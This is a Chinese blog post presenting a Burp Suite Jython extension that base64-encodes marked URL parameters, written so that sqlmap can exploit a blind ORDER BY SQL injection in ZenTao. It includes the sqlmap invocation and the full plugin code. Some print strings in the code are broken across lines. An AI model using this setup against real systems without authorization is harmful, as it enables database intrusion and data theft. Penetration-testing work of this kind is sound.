zoukankan html css js c++ java

burpsuite插件开发系列_指定参数base64加密替换功能插件

1、指定参数base64加密替换功能插件：
D:plug_inase64encode.py

2、为何要开发这个插件？
参考：D:plug_inheader包头数据自动替换插件 est1.py
测试禅道的一个order by注入，发现提交的参数先使用base64加密后提交，由于是高版本mysql,无显错式注入，手工盲注根本就是不可能完成的任务，于是想到开发一个burpsuite的插件来自动替换指定的url中的参数。

3、burpsuite代理神器下设置发包方式：

//sqlmap插件设置方法,这里不讨论插件的使用方法，请自行google:
--dbms="mysql" --dbs --users --threads 10 --level 3 --hex --proxy="http://127.0.0.1:8080"

//替换指定参数的效果截图：

#!/user/bin/env python
#D:plug_inase64encode.py
#coding=utf8
#auther:pt007@vip.sina.com

from burp import IBurpExtender
from burp import IHttpListener
# 导入 burp 接口
from burp import IProxyListener
from javax.swing import JOptionPane
import hashlib
import json
import ssl
import sys
import string,re,base64

def base64encode(m):
    payload = base64.b64encode(m.group())
    return payload

class BurpExtender(IBurpExtender,IHttpListener,IProxyListener):

    def registerExtenderCallbacks(self,callbacks):
        self._callbacks=callbacks
        self._helpers=callbacks.getHelpers()
        callbacks.setExtensionName("base64encode")
        callbacks.registerHttpListener(self)
        callbacks.registerProxyListener(self)
        return

    def processHttpMessage(self,toolFlag,messageIsRequest,messageInfo):
        #if toolFlag==4 or toolFlag == 32:#Tool_proxy与intruder
        if toolFlag == 32 or toolFlag==4: #Tool_proxy与intruder
            if messageIsRequest: #操作request
                rq=messageInfo.getRequest()
                analyzerq=self._helpers.analyzeRequest(rq)
                headers=analyzerq.getHeaders()
                body=rq[analyzerq.getBodyOffset():]
                #print headers

                print "
------------------------------------------Original Header------------------------------------------"
                for header in headers:
                    print header
                print body.tostring()
                print type(header) #打印出类型

                print "
------------------------------------------Replaced Header------------------------------------------"
                global data
                data=body.tostring()
                url=headers[0]
                url=re.sub(r'{.*}',base64encode, url)
                headers[0]=url

                httpmsg=self._helpers.buildHttpMessage(headers,data)
                messageInfo.setRequest(httpmsg)
                tmpstr=self._helpers.bytesToString(httpmsg)
                #print tmpstr.encode('utf-8')
                #print type(header)
                #取回并打印出header包
                request = messageInfo.getRequest()
                analyzedRequest = self._helpers.analyzeResponse(request)
                request_header = analyzedRequest.getHeaders()
                for header in request_header:
                    print header
                print '
'+data

            if not messageIsRequest: #操作Response
                #Response包打印
                print "
------------------------------------------Response------------------------------------------"
                response = messageInfo.getResponse() # get response
                analyzedResponse = self._helpers.analyzeResponse(response)
                body = response[analyzedResponse.getBodyOffset():] 
                body_string = body.tostring() # get response_body
                response_header = analyzedResponse.getHeaders()
                for header in response_header:
                    print header
                print '
'+body_string
                print "
-------------------------------------------Response end--------------------------------------"


    #实现了proxy功能中的Edited request:
    def processProxyMessage(self,messageIsRequest,proxyMessage):
        if messageIsRequest:
            messageInfo=proxyMessage.getMessageInfo()
            #print "[+]"+messageInfo.getHttpService().getHost()
            try:
                request = messageInfo.getRequest()
                reqInfo = self._helpers.analyzeRequest(request)
                headers = reqInfo.getHeaders()
                bodyOffset = reqInfo.getBodyOffset()
                body= request[bodyOffset:]

                data=body.tostring()
                url=headers[0]
                url=re.sub(r'{.*}',base64encode, url)
                headers[0]=url
                newHttpMessage = self._helpers.buildHttpMessage(headers,data)
                tmpstr=self._helpers.bytesToString(newHttpMessage)
                print "
-------------------------------------------Edited request--------------------------------------"
                print "[tmpstr]:
"+tmpstr.encode('utf-8')
                messageInfo.setRequest(newHttpMessage);
                print "
-------------------------------------------Edited request end-----------------------------------"

            except Exception as e:
                print e

查看全文

相关阅读:
python 并发编程多线程 event
python 并发编程多线程定时器
 python 并发编程多线程信号量
 linux top 查看CPU命令
 python 并发编程多线程 GIL与多线程
 python 并发编程多线程死锁现象与递归锁
 python 并发编程多线程 GIL与Lock
python GIL全局解释器锁与互斥锁目录
 python 并发编程多线程 GIL全局解释器锁基本概念
 执行python程序出现三部曲

原文地址：https://www.cnblogs.com/pt007/p/11857215.html